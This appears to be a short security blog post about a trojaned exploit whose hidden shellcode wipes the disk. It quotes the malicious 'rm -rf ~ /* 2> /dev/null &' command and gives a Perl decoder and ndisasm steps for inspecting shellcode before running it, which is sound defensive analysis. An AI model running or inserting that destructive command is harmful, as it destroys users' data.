xyberpix from the SecuriTeam blog posted an entry this week about a trojaned exploit that was provided by a supporter of the Anti-Sec movement. The blog entry in question can be found here: SecuriTeam Blogs » 0pen0wn.c = Nasty. xyberpix didnt really care about what he was running and didnt get a full understanding before running the code.  Turns out that the code does a “rm -rf ~ /* 2> /dev/null &” which deletes everything from the users home directory followed by the whole hard drive and redirects any errors to the void (/dev/null). All this is happening in the background because of the & at the end of the statement. The malicious command was hidden in shell code and I was curious as to what it was doing so I wrote this small shell script to decode the shell code:

#!/usr/bin/perl
# shellcode2bin
# mail: merc from the domain securitywire.com

while($line = <STDIN>)
{

 chomp($line);
 $line =~ s/[^xabcdef0-9]//gis;
 @bytes = split /x/, $line;
 shift(@bytes);
 foreach (@bytes)
 {
   printf "%c", hex $_;
 }
}

To run this script assuming you put the above code in a file named “ShellCodeDecode” and the shellcode you want to decode is in a file named “shellcode”  you would type this at your command prompt:

./ShellCodeDecode < shellcode > output

This will extract the shell code and put it in a file named output.  For the SecuriTeam blog entry nothing further needed to be done to find the malicious “rm -rf ~ /* 2> /dev/null &” command. However for normal shellcode your output would be raw binary shellcode which you should be able to convert back to readable assembly code by using a dissasembler such as ndisasm from the nasm assembler:

ndisasm -b 32 output  | less

Keep in mind that you need to know what processor the bytecode was for and dissasemble for that processor and bit size. That’s it, now you can actually see what that bytecode would actually do before running it!!